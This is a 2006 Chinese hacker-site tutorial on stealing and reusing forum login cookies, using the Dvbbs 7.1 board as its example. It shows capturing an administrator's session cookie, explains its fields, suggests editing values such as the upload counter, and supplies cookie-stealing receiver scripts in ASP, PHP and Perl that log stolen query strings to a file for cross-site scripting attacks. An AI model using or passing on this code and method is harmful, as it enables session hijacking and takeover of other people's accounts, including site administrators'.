黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[图文]教你怎样从cookie里获取信息
      ★★★★★

教你怎样从cookie里获取信息

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-5-11 9:51:05
网站安全版有人在问,怎么从cookies中提取信息,我用动网论坛的来说明一下。

   使用工具:
1:WsockExpert,用来抓取cookies。
2:动网论坛7.1 sp1。
抓取cookies步骤:打开动网论坛的页面,用户登陆以后,打开WsockExpert后点击“打开进程“,选择ie中的动网论坛的页面,然后再到动网页面中随便点击一个版块,这时候WsockExpert中就有显示了。

其中cookies信息是
DvForum=userid=1&usercookies=0&userhidden=2&password=ChXJBnM9970wE067&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=4517632; ASPSESSIONIDCATCRCBA=KLOBIMEDCHPOEKGAHMLPBLJK; upNum=0

参数说明
DvForum是动网论坛。
userid=1表示你的用户名的id是1,也就是这个论坛的第1个用户。
userhidden如果是1表示隐身,2表示上线。
Password这里是ChXJBnM9970wE067,并不是真正登陆密码的md5加密以后的值。ChXJBnM9970wE067其实就是数据库中的TruePassWord中的值。有些获取的cookies中这里可能是明文密码或者是md5加密以后的密码,能不能破解就看你的运气了。
userclass=%B9%DC%C0%ED%D4%B1,表示用户级别是管理员,当然其它的级别也是同样的原理。
username=admin就不用我说了吧。
upNum=0表示你上传的文件数量,如果每天上传数量有限制的话,修改这里可能有些cookies会有效的。

修改cookies的工具: minibrowser等可以修改cookies的工具。

盗取cookies的asp代码
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2        
lP.Close
set lP=nothing
%>

盗取cookies的php代码
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."\n\n\n\n");
fclose($fp);
}
?>

盗取cookies的cgi代码
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.
#玄猫摘自http://www.infosecurity.org.cn/c ... ticle0128051326.htm

$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);
文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886